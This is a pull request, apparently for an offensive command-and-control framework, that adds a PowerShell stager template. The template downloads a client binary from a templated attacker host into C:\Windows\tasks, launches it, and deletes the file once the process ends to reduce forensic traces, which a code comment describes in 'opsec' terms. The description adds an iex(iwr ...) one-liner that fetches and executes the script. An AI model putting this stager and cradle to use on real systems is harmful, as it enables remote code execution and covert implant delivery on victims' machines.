### PR TITLE
adding powershell webserver template

### DIFF
--- a/internal/server/webserver/shellscripts/templates/ps1
+++ b/internal/server/webserver/shellscripts/templates/ps1
@@ -1,0 +1,20 @@
+$path = "C:\Windows\tasks"
+$wc = New-Object net.webclient
+$wc.Downloadfile("{{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}}", "$path\{{.Name}}")
+$baseFileName = "{{.Name}}"
+$fullPath = "$path\{{.Name}}"
+$processName = [System.IO.Path]::GetFileNameWithoutExtension($baseFileName)
+Set-ItemProperty -Path "$path\{{.Name}}" -Name IsReadOnly -Value $false
+Start-Process -Filepath "$path\{{.Name}}"
+# poor mans fileless and arguable not very opsec friendly...
+while ($true) {
+    $process = Get-Process -Name $processName -ErrorAction SilentlyContinue
+    if (-not $process) {
+        if (Test-Path $fullPath) {
+            Remove-Item $fullPath -Force
+        }
+        break
+    }
+    Start-Sleep -Seconds 5
+}
+


### PR DESCRIPTION
This adds a template to be called with the webserver with powershell.  It will start the client process and then start a loop to remove the binary once the process has been terminated.
This check is entirely optional.

example:
`iex(iwr <IP>:<PORT>/<client>.exe.ps1 -usebasicp)`
